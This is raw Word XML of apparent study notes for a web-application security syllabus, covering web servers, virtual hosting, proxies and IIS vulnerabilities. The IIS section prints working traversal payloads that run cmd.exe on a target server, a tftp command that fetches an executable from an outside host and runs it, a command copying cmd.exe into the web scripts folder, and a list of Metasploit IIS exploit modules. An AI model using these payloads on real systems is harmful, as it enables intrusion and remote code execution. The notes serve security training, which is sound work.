              <w:t xml:space="preserve"> Enterprise Architectures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Design of tiered architectures.</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The concepts of logical and physical separation.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00434D06"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Differences between presentation, application and database layers.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G4</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Protocols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Web protocols: HTTP, HTTPS, SOAP.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00434D06"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All HTTP web methods and response codes.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434D06" w:rsidRP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G5</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Mark-up Languages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00434D06" w:rsidRPr="00A42E2F" w:rsidRDefault="000336A2" w:rsidP="00434D06">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000336A2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Web mark-up languages: HTML and XML.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="889" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00434D06" w:rsidRPr="00434D06" w:rsidRDefault="00434D06" w:rsidP="00434D06">
            <w:pPr>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G6</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Programming Languages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00434D06"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web programming languages: JSP, ASP, PHP, CGI based Perl and JavaScript.</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G8</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APIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00434D06" w:rsidRPr="00A42E2F"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Application interfaces: CGI, ISAPI filters and Apache modules.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38663A" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>G1 - Web Server Operation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="0038663A" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">G1a - </w:t>
      </w:r>
      <w:r w:rsidRPr="0038663A">
        <w:t>How a web server functions in terms of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the client/server architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRDefault="00B055A9" w:rsidP="0038663A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B055A9">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A web server processes HTTP requests and serves responses. The term "web server" can refer either to web server software or to the particular device or computer dedicated to serving the web pages.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B055A9" w:rsidRPr="00B055A9" w:rsidRDefault="00B055A9" w:rsidP="00B055A9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B055A9">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP traffic consists of request and responses. All HTTP traffic can be associated with the task of requesting content or responding to those requests. Every HTTP message sent from a Web browser to a Web server is classified as an HTTP request, whereas every message sent from a Web server to a Web browser is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">classified as an HTTP response. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="0038663A" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>G1b - C</w:t>
      </w:r>
      <w:r w:rsidRPr="0038663A">
        <w:t xml:space="preserve">oncepts of </w:t>
      </w:r>
      <w:r>
        <w:t>virtual hosting and web proxies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="00C30BE4" w:rsidRDefault="00C30BE4" w:rsidP="0038663A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C30BE4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Virtual hosting:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="00C30BE4" w:rsidRDefault="00C30BE4" w:rsidP="0038663A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C30BE4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Many web hosters offer lower-cost web hosting services by sharing one computer between several customers. This is called shared hosting or virtual hosting. Each web site appears to be hosted by a different server, but they really are hosted on the same physical server. From the end user's perspective, virtually hosted web sites should be indistinguishable from sites hosted on separate dedicated servers. Enhanced versions of HTTP/1.0 and the official version of HTTP/1.1 define a Host request header that carries the site name. The web server can identify the virtual site from the Host header.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="00C30BE4" w:rsidRDefault="00C30BE4" w:rsidP="0038663A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="00C30BE4" w:rsidRDefault="00C30BE4" w:rsidP="00C30BE4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C30BE4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Proxies:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="00C30BE4" w:rsidRDefault="00C30BE4" w:rsidP="00C30BE4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C30BE4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web proxy servers are middlemen that fulfill transactions on the client's behalf.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C30BE4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Without a web proxy, HTTP clients talk directly to HTTP servers. With a web proxy, the client instead </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C30BE4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>talks to the proxy, which itself communicates</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C30BE4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the server on the client's behalf. The client still completes the transaction, but through the good services of the proxy server. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="00C30BE4" w:rsidRDefault="00C30BE4" w:rsidP="00C30BE4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C30BE4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>HTTP proxy servers are both web servers and web clients. Because HTTP clients send request messages to proxies, the proxy server must properly handle the requests and the connections and return responses, just like a web server. At the same time, the proxy itself sends requests to servers, so it must also behave like a correct HTTP client, sending requests and receiving responses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>G2 - Web Servers &amp; their Flaws</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="0038663A" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">G2a - </w:t>
      </w:r>
      <w:r w:rsidRPr="0038663A">
        <w:t>Common web servers and their fundamental differences and vulnerabilities associated with them:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0038663A">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="0038663A">
        <w:tab/>
        <w:t>IIS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="00D308EC" w:rsidRDefault="00C30BE4" w:rsidP="00C30BE4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IIS Vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00D308EC" w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="00D308EC" w:rsidRDefault="00C30BE4" w:rsidP="00C30BE4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>There are various extensions that are mapped to different handler DLLs in a default installation of IIS 5.0.</w:t>
      </w:r>
      <w:r w:rsidR="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">It is possible to detect the presence of each file extension mapping via the different error messages generated when that file extension is requested. In some cases, discovering a particular mapping may indicate the presence of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a web</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> server vulnerability —for example, the .printer and .ida/.idq handlers in IIS have in the past been found vulnerable to buffer overflow vulnerabilities.</w:t>
      </w:r>
      <w:r w:rsidR="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>An example of the first problem is the CodeBrws.asp sample script that shipped with older versions of Microsoft IIS server. Other IIS sample scripts have contained vulnerabilities which enabled an attacker to execute database queries, brute force Windows account credentials, and perform cross-site scripting. In addition to fixing the specific vulnerabilities concerned, Microsoft has removed sample content altogether from later versions of IIS, to prevent this kind of problem from arising.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="00D308EC" w:rsidRDefault="00C30BE4" w:rsidP="00C30BE4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="00D308EC" w:rsidRDefault="00C30BE4" w:rsidP="00C30BE4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WebDav:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="00D308EC" w:rsidRDefault="00C30BE4" w:rsidP="00C30BE4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>• COPY — Copies the specified resource to the location given in the Destination header.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="00D308EC" w:rsidRDefault="00C30BE4" w:rsidP="00C30BE4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>• MOVE — Moves the specified resource to the location given in the Destination header.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="00D308EC" w:rsidRDefault="00C30BE4" w:rsidP="00C30BE4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>• SEARCH — Searches a directory path for resources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="00D308EC" w:rsidRDefault="00C30BE4" w:rsidP="00C30BE4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>• PROPFIND — Retrieves information about the specified resource, such as author, size, and content type.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="00D308EC" w:rsidRDefault="00C30BE4" w:rsidP="00C30BE4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Several of these methods are part of the WebDAV (Web-based Distributed Authoring and Versioning) extensions to the HTTP protocol, which allow for collaborative editing and management of web server content.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="00D308EC" w:rsidRDefault="00C30BE4" w:rsidP="00C30BE4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Older versions of IIS 5 contained </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> whereby the WebDAV SEARCH method could be used to obtain a listing of the web root and all subdirectories. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D308EC" w:rsidRPr="00D308EC" w:rsidRDefault="00D308EC" w:rsidP="00C30BE4">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URL Dbl </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Decode :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00D308EC" w:rsidRPr="008F32D6" w:rsidRDefault="00D308EC" w:rsidP="008F32D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F32D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>scripts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008F32D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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Unicode Decode: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D308EC" w:rsidRPr="008F32D6" w:rsidRDefault="00D308EC" w:rsidP="008F32D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F32D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>scripts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008F32D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/..%c1%9c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008F32D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008F32D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/winnt/system32/cmd.exe?/c+dir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D308EC" w:rsidRP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The Good Commands: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%c1%9c</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/winnt/system32/tftp.exe?-i+192.168.1.122+get+mt.exe</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%c1%9c</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/winnt/system32/cmd.exe?/c+mt.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D308EC" w:rsidRPr="00D308EC" w:rsidRDefault="00D308EC" w:rsidP="00D308EC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">You may need to find a writeable directory, try the %TEMP% </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ones </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">:\windows\TEMP </w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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Creating File: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D308EC" w:rsidRPr="00D308EC" w:rsidRDefault="00D308EC" w:rsidP="00D308EC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a copy of cmd.exe called something else and echo &gt; it may work!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%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\c.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D308EC" w:rsidRP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Metasploit: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windows/iis/ms01_023_printer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Microsoft IIS 5.0 Printer Host Header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windows/iis/ms01_033_idq</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Microsoft IIS 5.0 IDQ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windows/iis/ms02_018_htr</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Microsoft IIS 4.0 .HTR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windows/iis/ms03_007_ntdll_webdav</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Microsoft IIS 5.0 WebDAV ntdll.dll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windows/isapi/fp30reg_chunked</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked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windows/isapi/ms00_094_pbserver</w:t>
      </w:r>
